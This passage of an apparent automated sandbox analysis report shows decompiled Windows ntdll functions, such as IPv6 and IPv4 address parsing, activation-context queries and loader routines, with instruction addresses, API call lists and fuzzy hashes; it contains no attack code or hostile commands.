								memmove(_t89 + (_t147 - _t134) * 2, _t153, _t134 - _t147 + _t134 - _t147);
								memset(_t153, 0, 8 - _v12 + 8 - _v12);
							}
							return 0;
						}
						if(_t151 != 0) {
							if(_v16 > 3) {
								goto L13;
							}
							_t135 = wcstol(_v28, 0, 0xa);
							_t157 = _t157 + 0xc;
							if(_t135 > 0xff) {
								goto L13;
							}
							_t145 = _a12;
							 *((char*)(_t151 + _v24 * 2 + _t145)) = _t135;
							_t134 = _v12;
							goto L68;
						}
						if(_v16 > 4) {
							goto L13;
						}
						_t110 = wcstol(_v28, _t151, 0x10);
						_t145 = _a12;
						_t157 = _t157 + 0xc;
						 *((short*)(_t145 + _v24 * 2)) = _t110;
						_t134 = _v12;
						goto L68;
					} else {
						goto L13;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t113 = _t129;
					if(_t113 == 0) {
						L15:
						if(_t150 == 0x3a) {
							if(_t144 != 0 || _v12 > _t144) {
								L9:
								_t134 = _v12;
								goto L10;
							} else {
								_t114 =  &(_t146[0]);
								if(_t146[0] != 0x3a) {
									goto L9;
								}
								_t130 = _v24;
								_t154 = _a12;
								_v32 = 1;
								_v12 = 2;
								 *((short*)(_t154 + _t130 * 2)) = 0;
								_v24 = 1 + _t130;
								_t146 = _t114;
								_t47 =  &(_t144[0]); // 0x2
								_t129 = _t47;
								L49:
								_t115 = _v28;
								if(_t115 == 0) {
									goto L24;
								}
								if(_t144 != 0) {
									if(_v16 > 3) {
										goto L13;
									}
									_t116 = wcstol(_t115, 0, 0xa);
									_t157 = _t157 + 0xc;
									if(_t116 > 0xff) {
										goto L13;
									}
									_t144 = _v20;
									 *(_t144 + _v24 * 2 + _t154 - 1) = _t116;
									_t141 = _v5;
									goto L24;
								}
								if(_v16 > 4) {
									goto L13;
								}
								_t117 = wcstol(_t115, _t144, 0x10);
								_t144 = _v20;
								_t157 = _t157 + 0xc;
								_t118 = _v24;
								 *((short*)(_t154 + _t118 * 2)) = _t117;
								_t141 = _v5;
								_v24 = 1 + _t118;
								goto L24;
							}
						}
						_t134 = _v12;
						if(_t134 > 7 || _t150 >= 0x80) {
							goto L10;
						} else {
							_t121 = iswctype(_t150, 4);
							_t157 = _t157 + 8;
							if(_t121 != 0) {
								_t144 = _v20;
								_t129 = 1;
								_t138 = 0;
								_v28 = _t146;
								_v16 = 1;
								L23:
								_v5 = _t138;
								goto L24;
							}
							_t122 = iswctype(_t150, 0x80);
							_t157 = _t157 + 8;
							if(_t122 == 0) {
								goto L9;
							}
							_t144 = _v20;
							if(_t144 != 0) {
								goto L9;
							}
							_t129 = 1;
							_v28 = _t146;
							_v16 = 1;
							L22:
							_t138 = 1;
							goto L23;
						}
					}
					_t123 = _t113 - 1;
					if(_t123 != 0) {
						if(_t123 == 1) {
							goto L15;
						}
						L39:
						if(_t129 == 1) {
							goto L24;
						}
						_t154 = _a12;
						goto L49;
					}
					if(_t150 >= 0x80) {
						L7:
						if(_t150 == 0x3a) {
							if(_t144 != 0) {
								goto L9;
							}
							_t155 = _v12;
							if(_t155 > 6) {
								goto L9;
							}
							if(_t146[0] != 0x3a) {
								_t129 = 0;
								_t126 = 1;
								L38:
								_v12 = _t155 + _t126;
								goto L39;
							}
							if(_v32 != _t144) {
								goto L9;
							}
							_t146 =  &(_t146[0]);
							_v32 = _t155 + 1;
							_t129 = 2;
							_t126 = 2;
							goto L38;
						}
						if(_t150 == 0x2e) {
							if(_t141 != 0 || _t144 > 2 || _v12 > 6) {
								goto L9;
							} else {
								_t154 = _a12;
								_t144 =  &(_t144[0]);
								_v20 = _t144;
								_t129 = 0;
								goto L49;
							}
						}
						goto L9;
					}
					_t127 = iswctype(_t150, 4);
					_t157 = _t157 + 8;
					if(_t127 != 0) {
						_v16 = 1 + _v16;
						_t141 = _v5;
						_t144 = _v20;
						goto L24;
					}
					_t128 = iswctype(_t150, 0x80);
					_t144 = _v20;
					_t157 = _t157 + 8;
					if(_t128 != 0) {
						_v16 =  &(_v16[0]);
						if(_t144 == 0) {
							goto L22;
						}
						goto L9;
					}
					_t141 = _v5;
					goto L7;
					L24:
					_t150 = _t146[0] & 0x0000ffff;
					_t146 =  &(_t146[0]);
				} while (_t150 != 0);
				goto L9;
			}







































                                                                                                                            0x6b1d0bdb
                                                                                                                            0x6b1d0bde
                                                                                                                            0x6b1d0be0
                                                                                                                            0x6b1d0be2
                                                                                                                            0x6b1d0be7
                                                                                                                            0x6b1d0bea
                                                                                                                            0x6b1d0bed
                                                                                                                            0x6b1d0bf0
                                                                                                                            0x6b1d0bf3
                                                                                                                            0x6b1d0bf6
                                                                                                                            0x6b1d0bf9
                                                                                                                            0x6b1d0bff
                                                                                                                            0x6b1d0d14
                                                                                                                            0x6b1d0c69
                                                                                                                            0x6b1d0c6c
                                                                                                                            0x6b1d0c6f
                                                                                                                            0x6b1d0c73
                                                                                                                            0x6b22e8fd
                                                                                                                            0x6b1d0c8d
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0c8d
                                                                                                                            0x6b22e903
                                                                                                                            0x6b22e904
                                                                                                                            0x6b22e904
                                                                                                                            0x6b1d0c79
                                                                                                                            0x6b1d0c7e
                                                                                                                            0x6b22e90f
                                                                                                                            0x6b22e97b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e981
                                                                                                                            0x6b22e989
                                                                                                                            0x6b22e98d
                                                                                                                            0x6b22e98f
                                                                                                                            0x6b22e993
                                                                                                                            0x6b22e99d
                                                                                                                            0x6b22e9a5
                                                                                                                            0x6b22e9b8
                                                                                                                            0x6b22e9bd
                                                                                                                            0x00000000
                                                                                                                            0x6b22e9c0
                                                                                                                            0x6b22e913
                                                                                                                            0x6b22e944
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e956
                                                                                                                            0x6b22e958
                                                                                                                            0x6b22e961
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e96a
                                                                                                                            0x6b22e970
                                                                                                                            0x6b22e973
                                                                                                                            0x00000000
                                                                                                                            0x6b22e973
                                                                                                                            0x6b22e919
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e925
                                                                                                                            0x6b22e92a
                                                                                                                            0x6b22e931
                                                                                                                            0x6b22e937
                                                                                                                            0x6b22e93b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0c05
                                                                                                                            0x6b1d0c05
                                                                                                                            0x6b1d0c07
                                                                                                                            0x6b1d0c0a
                                                                                                                            0x6b1d0c9b
                                                                                                                            0x6b1d0c9f
                                                                                                                            0x6b22e82f
                                                                                                                            0x6b1d0c66
                                                                                                                            0x6b1d0c66
                                                                                                                            0x00000000
                                                                                                                            0x6b22e83e
                                                                                                                            0x6b22e843
                                                                                                                            0x6b22e846
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e84c
                                                                                                                            0x6b22e851
                                                                                                                            0x6b22e854
                                                                                                                            0x6b22e85b
                                                                                                                            0x6b22e862
                                                                                                                            0x6b22e867
                                                                                                                            0x6b22e86a
                                                                                                                            0x6b22e86c
                                                                                                                            0x6b22e86c
                                                                                                                            0x6b22e86f
                                                                                                                            0x6b22e86f
                                                                                                                            0x6b22e874
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e87c
                                                                                                                            0x6b22e8b2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e8bd
                                                                                                                            0x6b22e8c2
                                                                                                                            0x6b22e8ca
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e8d0
                                                                                                                            0x6b22e8d9
                                                                                                                            0x6b22e8dd
                                                                                                                            0x00000000
                                                                                                                            0x6b22e8dd
                                                                                                                            0x6b22e882
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e88c
                                                                                                                            0x6b22e891
                                                                                                                            0x6b22e898
                                                                                                                            0x6b22e89b
                                                                                                                            0x6b22e89e
                                                                                                                            0x6b22e8a3
                                                                                                                            0x6b22e8a6
                                                                                                                            0x00000000
                                                                                                                            0x6b22e8a6
                                                                                                                            0x6b22e82f
                                                                                                                            0x6b1d0ca5
                                                                                                                            0x6b1d0cab
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0cb7
                                                                                                                            0x6b1d0cba
                                                                                                                            0x6b1d0cbf
                                                                                                                            0x6b1d0cc4
                                                                                                                            0x6b22e8e5
                                                                                                                            0x6b22e8e8
                                                                                                                            0x6b22e8ed
                                                                                                                            0x6b22e8ef
                                                                                                                            0x6b22e8f2
                                                                                                                            0x6b1d0cf0
                                                                                                                            0x6b1d0cf0
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0cf0
                                                                                                                            0x6b1d0cd0
                                                                                                                            0x6b1d0cd5
                                                                                                                            0x6b1d0cda
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0cdc
                                                                                                                            0x6b1d0ce1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0ce3
                                                                                                                            0x6b1d0ce8
                                                                                                                            0x6b1d0ceb
                                                                                                                            0x6b1d0cee
                                                                                                                            0x6b1d0cee
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0cee
                                                                                                                            0x6b1d0cab
                                                                                                                            0x6b1d0c10
                                                                                                                            0x6b1d0c13
                                                                                                                            0x6b22e7a1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e7f9
                                                                                                                            0x6b22e7fc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e802
                                                                                                                            0x00000000
                                                                                                                            0x6b22e802
                                                                                                                            0x6b1d0c21
                                                                                                                            0x6b1d0c52
                                                                                                                            0x6b1d0c56
                                                                                                                            0x6b22e7b9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e7bf
                                                                                                                            0x6b22e7c5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e7d0
                                                                                                                            0x6b22e7ed
                                                                                                                            0x6b22e7ef
                                                                                                                            0x6b22e7f4
                                                                                                                            0x6b22e7f6
                                                                                                                            0x00000000
                                                                                                                            0x6b22e7f6
                                                                                                                            0x6b22e7d5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b22e7de
                                                                                                                            0x6b22e7e1
                                                                                                                            0x6b22e7e4
                                                                                                                            0x6b22e7e9
                                                                                                                            0x00000000
                                                                                                                            0x6b22e7e9
                                                                                                                            0x6b1d0c60
                                                                                                                            0x6b22e809
                                                                                                                            0x00000000
                                                                                                                            0x6b22e822
                                                                                                                            0x6b22e822
                                                                                                                            0x6b22e825
                                                                                                                            0x6b22e826
                                                                                                                            0x6b22e829
                                                                                                                            0x00000000
                                                                                                                            0x6b22e829
                                                                                                                            0x6b22e809
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0c60
                                                                                                                            0x6b1d0c26
                                                                                                                            0x6b1d0c2b
                                                                                                                            0x6b1d0c30
                                                                                                                            0x6b22e7a9
                                                                                                                            0x6b22e7ac
                                                                                                                            0x6b22e7af
                                                                                                                            0x00000000
                                                                                                                            0x6b22e7af
                                                                                                                            0x6b1d0c3c
                                                                                                                            0x6b1d0c41
                                                                                                                            0x6b1d0c44
                                                                                                                            0x6b1d0c49
                                                                                                                            0x6b1d0d08
                                                                                                                            0x6b1d0d0d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0d0f
                                                                                                                            0x6b1d0c4f
                                                                                                                            0x00000000
                                                                                                                            0x6b1d0cf3
                                                                                                                            0x6b1d0cf3
                                                                                                                            0x6b1d0cf7
                                                                                                                            0x6b1d0cfa
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • iswctype.1105(?,00000004,00000000,?,00000000,?,?,00000000,00000000), ref: 6B1D0C26
                                                                                                                            • iswctype.1105(?,00000080,?,00000000,?,?,00000000,00000000), ref: 6B1D0C3C
                                                                                                                            • iswctype.1105(?,00000004,00000000,?,00000000,?,?,00000000,00000000), ref: 6B1D0CBA
                                                                                                                            • iswctype.1105(?,00000080,?,00000000,?,?,00000000,00000000), ref: 6B1D0CD0
                                                                                                                            • wcstol.1105(?,00000000,00000010,00000000,?,00000000), ref: 6B22E88C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: iswctype$wcstol
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3196148086-0
                                                                                                                            • Opcode ID: e8cce5817cc4ce449349599480dfbb7a9bb6f94171a4a7226f78549168923cd8
                                                                                                                            • Instruction ID: 040cf723b34161df8a45e0390453c12248dad2a69f373557f876a7054b1cc5f0
                                                                                                                            • Opcode Fuzzy Hash: e8cce5817cc4ce449349599480dfbb7a9bb6f94171a4a7226f78549168923cd8
                                                                                                                            • Instruction Fuzzy Hash: 5791F175E0421AABCB20CF68C895BDFB7F1FF51705F9080AAD854A7250E33DAA45CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D71D0, Relevance: 13.7, APIs: 9, Instructions: 162COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlIpv4StringToAddressA.1105(00000000,?,00000000,00000000), ref: 6B1D71FB
                                                                                                                              • Part of subcall function 6B1D7220: __isascii.1105(0000000A,?), ref: 6B1D7275
                                                                                                                              • Part of subcall function 6B1D7220: isdigit.1105(00000000,?), ref: 6B1D7283
                                                                                                                            • __isascii.1105(?,00000000,?,00000000,00000000), ref: 6B23233F
                                                                                                                            • isdigit.1105(?,00000000,?,00000000,00000000), ref: 6B23234A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: __isasciiisdigit$AddressIpv4String
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 960699662-0
                                                                                                                            • Opcode ID: d1e8079f3b444f1ff0fe202882e6dd36213e97e5e6d2fb41066c33beb2a1206c
                                                                                                                            • Instruction ID: 8fcfece560d0bb8da24a5033c2920f3ca7ba8d40e6f4e09b58625e57878b7762
                                                                                                                            • Opcode Fuzzy Hash: d1e8079f3b444f1ff0fe202882e6dd36213e97e5e6d2fb41066c33beb2a1206c
                                                                                                                            • Instruction Fuzzy Hash: F4417AB694423BA7EB028E24D8917FE77F49F12721F20416AE890EB1C0D73CC682D391
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2646A4, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 206COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context,RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation,?,?,6B2217F0,00000000,?,00000000,?), ref: 6B2646ED
                                                                                                                              • Part of subcall function 6B201D47: memset.1105(00000000,00000000,6B2217F0,?,00000001,00000000,?,6B1D8D70,00000000,?,?,00000030,?,?,00000001,?), ref: 6B201D87
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() received invalid file index (%u, max is %u) in Assembly (%u),RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation,00000000,?,6B2AFE98,00000001,?,C00000E5,00000058,?,?,00000002,-00000F38,00000000), ref: 6B26474E
                                                                                                                            • memcpy.1105(00000015,?,00000000,00000001,?,C00000E5,00000058,?,?,00000002,-00000F38,00000000,6B2217F0,00000000,?,00000000), ref: 6B264831
                                                                                                                            • memcpy.1105(00000015,?,-00000F38,00000001,?,C00000E5,00000058,?,?,00000002,-00000F38,00000000,6B2217F0,00000000,?,00000000), ref: 6B2648A2
                                                                                                                            Strings
                                                                                                                            • RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation, xrefs: 6B2646E0, 6B264741
                                                                                                                            • SXS: %s() received invalid file index (%u, max is %u) in Assembly (%u), xrefs: 6B264746
                                                                                                                            • SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context, xrefs: 6B2646E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Printmemcpy$memset
                                                                                                                            • String ID: RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation$SXS: %s() received invalid file index (%u, max is %u) in Assembly (%u)$SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context
                                                                                                                            • API String ID: 3998808364-2744866428
                                                                                                                            • Opcode ID: 413a909b45ed9e040e9c393dcb888fd1de0414c5e3f85bb994a8727622fc813a
                                                                                                                            • Instruction ID: 2d470c3abd9bfd67cd51bc73fa6602f8adabec8bcaba7e1f558230117ea9a15d
                                                                                                                            • Opcode Fuzzy Hash: 413a909b45ed9e040e9c393dcb888fd1de0414c5e3f85bb994a8727622fc813a
                                                                                                                            • Instruction Fuzzy Hash: 7A816075E0021ADFCB05CF88C8D0A9EB7F5FF49345B148599E864AB345E334EA91CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B264496, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 195COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context,RtlpQueryAssemblyInformationActivationContextDetailedInformation,?,?,6B2217F0,00000000,?,?), ref: 6B2644DB
                                                                                                                              • Part of subcall function 6B201D47: memset.1105(00000000,00000000,6B2217F0,?,00000001,00000000,?,6B1D8D70,00000000,?,?,00000030,?,?,00000001,?), ref: 6B201D87
                                                                                                                            • memcpy.1105(00000059,-00000F38,FFFFFF98,00000001,C00000E5,?,00000058,?,00000000,00000001,-00000F38,?,6B2217F0,00000000,?,?), ref: 6B2645F6
                                                                                                                            • memcpy.1105(00000059,-00000F38,00000000,00000001,C00000E5,?,00000058,?,00000000,00000001,-00000F38,?,6B2217F0,00000000,?,?), ref: 6B264620
                                                                                                                            • memcpy.1105(00000059,-00000F38,FFFFFFC4,00000001,C00000E5,?,00000058,?,00000000,00000001,-00000F38,?,6B2217F0,00000000,?,?), ref: 6B26464A
                                                                                                                            • memcpy.1105(00000059,-00000F38,FFFFFECC,00000001,C00000E5,?,00000058,?,00000000,00000001,-00000F38,?,6B2217F0,00000000,?,?), ref: 6B264674
                                                                                                                            Strings
                                                                                                                            • RtlpQueryAssemblyInformationActivationContextDetailedInformation, xrefs: 6B2644CE
                                                                                                                            • SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context, xrefs: 6B2644D3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$Printmemset
                                                                                                                            • String ID: RtlpQueryAssemblyInformationActivationContextDetailedInformation$SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context
                                                                                                                            • API String ID: 3378804984-1390252366
                                                                                                                            • Opcode ID: 5d3787086d145321306b97094f6b8e191a94ba6f1c2c4e911564b360f867924c
                                                                                                                            • Instruction ID: e2144bd6b3d46fe7733c9a3668d6571ddd6eaf0780dc03d366bee9f69a3772ce
                                                                                                                            • Opcode Fuzzy Hash: 5d3787086d145321306b97094f6b8e191a94ba6f1c2c4e911564b360f867924c
                                                                                                                            • Instruction Fuzzy Hash: 008107B5A0060AAFC754CF28C8C0A9AB7F4FF18358B144569E958DB741E335F9A2CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D42EB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?,?,?,00000000,?,?,?,6B1D4176,00000003,?,00000000,00000000), ref: 6B1D4303
                                                                                                                            • _strnicmp.1105(?,secserv.dll,0000000C,00000003,?,00000000,00000000,?,?,?,00000000,?,?,?,6B1D4176,00000003), ref: 6B1D4340
                                                                                                                            • strncmp.1105(?,.txt,00000005), ref: 6B2306DD
                                                                                                                            • strncmp.1105(?,.txt2,00000006), ref: 6B2306F7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: strncmp$HeaderImage_strnicmp
                                                                                                                            • String ID: .txt$.txt2$secserv.dll
                                                                                                                            • API String ID: 290936131-436433099
                                                                                                                            • Opcode ID: 5e1cff725c691b26b58d89cc2f76ff7d01f945009db51ad82141ad685bdaaacb
                                                                                                                            • Instruction ID: 662132f61249bb7be955bc048b86ba52ce92197f41b59a54e2789218a73e4dcd
                                                                                                                            • Opcode Fuzzy Hash: 5e1cff725c691b26b58d89cc2f76ff7d01f945009db51ad82141ad685bdaaacb
                                                                                                                            • Instruction Fuzzy Hash: E021D870E0022AB7DB18CF698894F9FB7B9EF41749F104169D505D7140F338EA81DBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D41F7, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?,?,?,00000000), ref: 6B1D4214
                                                                                                                            • strncmp.1105(?,.aspack,00000008,00000003,?,00000000,00000000,?,?,?,00000000), ref: 6B1D4249
                                                                                                                            • strncmp.1105(?,.pcle,00000006,?,?,00000000), ref: 6B1D4261
                                                                                                                            • strncmp.1105(?,.sforce,00000008,?,?,?,?,?,00000000), ref: 6B1D4279
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: strncmp$HeaderImage
                                                                                                                            • String ID: .aspack$.pcle$.sforce
                                                                                                                            • API String ID: 3137002299-3067156003
                                                                                                                            • Opcode ID: b12f2912178e084ade07069697522967bfb2868048081fa9e49edd7d9c657629
                                                                                                                            • Instruction ID: 6e3baeac65b8db744afcba29e5f0776953d76445e1cfa6d9acf773e53cb4fc1e
                                                                                                                            • Opcode Fuzzy Hash: b12f2912178e084ade07069697522967bfb2868048081fa9e49edd7d9c657629
                                                                                                                            • Instruction Fuzzy Hash: FE212B35B402047BFB148F65EC81F9FB3E59F44745F008465FD089628AE73CE991CAA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E0C30, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockShared.1105(6B2C8550,?,?,00000000,000000FF,6B2AF868,00000038,6B1DF563), ref: 6B1E0C6F
                                                                                                                            • RtlReleaseSRWLockShared.1105(6B2C8550,6B2C8550,?,?,00000000,000000FF,6B2AF868,00000038,6B1DF563), ref: 6B1E0C98
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LockShared$AcquireRelease
                                                                                                                            • String ID: Calling TLS callback %p for DLL "%wZ" at %p$LdrpCallTlsInitializers$hS,k$hS,k$minkernel\ntdll\ldrtls.c
                                                                                                                            • API String ID: 2614130328-4007940757
                                                                                                                            • Opcode ID: 59786ba861dd910aef4f4252846c982db9c3da285b51e0025650f5f874a18caa
                                                                                                                            • Instruction ID: 778fc622c5f6d3df7d7676a85b7376c355ba4bb507c6e6cd83a335c0e4678b1b
                                                                                                                            • Opcode Fuzzy Hash: 59786ba861dd910aef4f4252846c982db9c3da285b51e0025650f5f874a18caa
                                                                                                                            • Instruction Fuzzy Hash: 1821A172D40A18BBCB10CF55888AB5ABBF4FB08714F11469AED2563240EB7CA801DAF1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EEC7F, Relevance: 12.3, APIs: 8, Instructions: 256memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001,-00000F38), ref: 6B1EECAD
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001,-00000F38), ref: 6B1EECD2
                                                                                                                            • RtlFreeHeap.1105(00000000,?,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001,-00000F38), ref: 6B1EED04
                                                                                                                            • RtlReleaseActivationContext.1105(-00000F38,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001,-00000F38), ref: 6B1EED28
                                                                                                                            • _wcsicmp.1105(6B2AFE98,?,6B2AFB78,00000030,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001,-00000F38), ref: 6B1EEE13
                                                                                                                            • _wcsicmp.1105(6B2AFE98,?,6B2AFB78,00000030,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?,?,?,00000001,-00000F38), ref: 6B1EEE74
                                                                                                                            • RtlFreeHeap.1105(00000000,?,6B2217F0,6B1FF715,6B1FF5C0,?,?,?,00000001,-00000F38), ref: 6B20C28C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
